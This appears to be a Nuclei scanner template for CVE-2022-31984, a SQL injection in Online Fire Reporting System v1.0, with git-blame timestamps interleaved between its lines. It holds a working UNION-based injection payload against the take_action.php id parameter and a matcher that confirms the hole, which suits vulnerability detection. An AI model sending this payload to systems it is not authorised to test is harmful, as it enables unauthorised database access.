2023-06-05 07:03:16 +00:00
|
|
|
id: CVE-2022-31984
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Online Fire Reporting System v1.0 - SQL injection
|
|
|
|
author: theamanrawat
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
|
2023-06-05 07:03:16 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
|
|
|
|
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 7.2
|
|
|
|
cve-id: CVE-2022-31984
|
|
|
|
cwe-id: CWE-89
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-score: 0.00618
|
2023-10-30 20:55:37 +00:00
|
|
|
epss-percentile: 0.76459
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
|
2023-06-05 07:03:16 +00:00
|
|
|
metadata:
|
|
|
|
verified: "true"
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: online_fire_reporting_system_project
|
|
|
|
product: online_fire_reporting_system
|
2023-06-05 07:03:16 +00:00
|
|
|
tags: cve,cve2022,sqli,online-fire-reporting
|
|
|
|
variables:
|
|
|
|
num: '999999999'
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '{{md5(num)}}'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-31 09:39:52 +00:00
|
|
|
# digest: 490a00463044022053122ddda07b5c823cba650de953f0f699a4db1f495e087b77984c2230bc8c4202207a9b4c7ecd11ace080616e95c45bee8b802b6701a6f2adbe624f228c6745f77a:922c64590222798bb761d5b6d8e72950
|